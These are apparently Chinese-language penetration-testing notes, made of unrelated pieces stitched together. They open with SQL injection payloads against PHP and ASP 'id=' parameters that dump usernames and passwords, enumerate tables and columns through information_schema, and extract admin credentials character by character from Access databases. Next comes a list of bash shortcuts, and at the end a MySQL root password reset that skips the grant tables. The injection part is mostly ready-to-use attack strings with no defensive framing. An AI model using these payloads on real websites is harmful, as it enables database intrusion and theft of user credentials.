xxx.php?id=1 and 1=2 union select 1, group_concat(username,0x3a,password),3 from user
3.使用内建数据库查询表段和字段 查表段:
1 2 3
xxx.php?id=1 and 1=2 union select 1,2,table_name from (select * from information_schema.tables where table_schema=数据库名的hex order by table_schema limit 0,1)t limit 1–
查字段:
1 2 3
xxx.php?id=1 and 1=2 union select 1,2,column_name from (select * from information_schema.columns where table_name=表名的hex and table_schema=数据库名hex值 order by 1 limit 1,1)t limit 1–
这里可以再结合下concat的拼接功能
1 2 3 4
xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20) from (select * from information_schema.columns where table_name=表名的hex and table_schema=数据库名hex值 order by 1 limit 0,n)t limit 1– [n表示第n条数据]
Access篇
猜表名
1
*.asp?id=1 and exists (select * from admin)
猜列名
1
*.asp?id=1 and exists (select password from admin)
Order by查询
1
*.asp?id=1 order by 3
union 查询
1
*.asp?id=1 union select 1,password,3 from admin
不支持union的情况 先判断内容的长度
1
*.asp?id=132 and (select top 1 len(user) from admin) >5
然后一个一个猜
1
*.asp?id=132 and (select top 1 asc(mid(user,1,1)) from admin)>97
编辑命令 Ctrl + a :移到命令行首 Ctrl + e :移到命令行尾 Ctrl + f :按字符前移(右向) Ctrl + b :按字符后移(左向) Alt + f :按单词前移(右向) Alt + b :按单词后移(左向) Ctrl + xx:在命令行首和光标之间移动 Ctrl + u :从光标处删除至命令行首 Ctrl + k :从光标处删除至命令行尾 Ctrl + w :从光标处删除至字首 Alt + d :从光标处删除至字尾 Ctrl + d :删除光标处的字符 Ctrl + h :删除光标前的字符 Ctrl + y :粘贴至光标后 Alt + c :从光标处更改为首字母大写的单词 Alt + u :从光标处更改为全部大写的单词 Alt + l :从光标处更改为全部小写的单词 Ctrl + t :交换光标处和之前的字符 Alt + t :交换光标处和之前的单词 Alt + Backspace:与 Ctrl + w 类似 重新执行命令 Ctrl + r:逆向搜索命令历史 Ctrl + g:从历史搜索模式退出 Ctrl + p:历史中的上一条命令 Ctrl + n:历史中的下一条命令 Alt + .:使用上一条命令的最后一个参数 控制命令 Ctrl + l:清屏 Ctrl + o:执行当前命令,并选择上一条命令 Ctrl + s:阻止屏幕输出 Ctrl + q:允许屏幕输出 Ctrl + c:终止命令 Ctrl + z:挂起命令 Bang (!)命令 !!:执行上一条命令 !blah:执行最近的以 blah 开头的命令,如 !ls !blah:p:仅打印输出,而不执行 !$:上一条命令的最后一个参数,与 Alt + . 相同 !$:p:打印输出 !$ 的内容 !:上一条命令的所有参数 !:p:打印输出 !* 的内容 ^blah:删除上一条命令中的 blah ^blah^foo:将上一条命令中的 blah 替换为 foo ^blah^foo^:将上一条命令中所有的 blah 都替换为 foo
/etc/init.d/mysql stop mysqld_safe --skip-grant-tables& mysql --user=root mysql mysql>update user set Password=PASSWORD('new-password'); mysql>flush privileges; mysql>exit; killall mysqld_safe& /etc/init.d/mysql start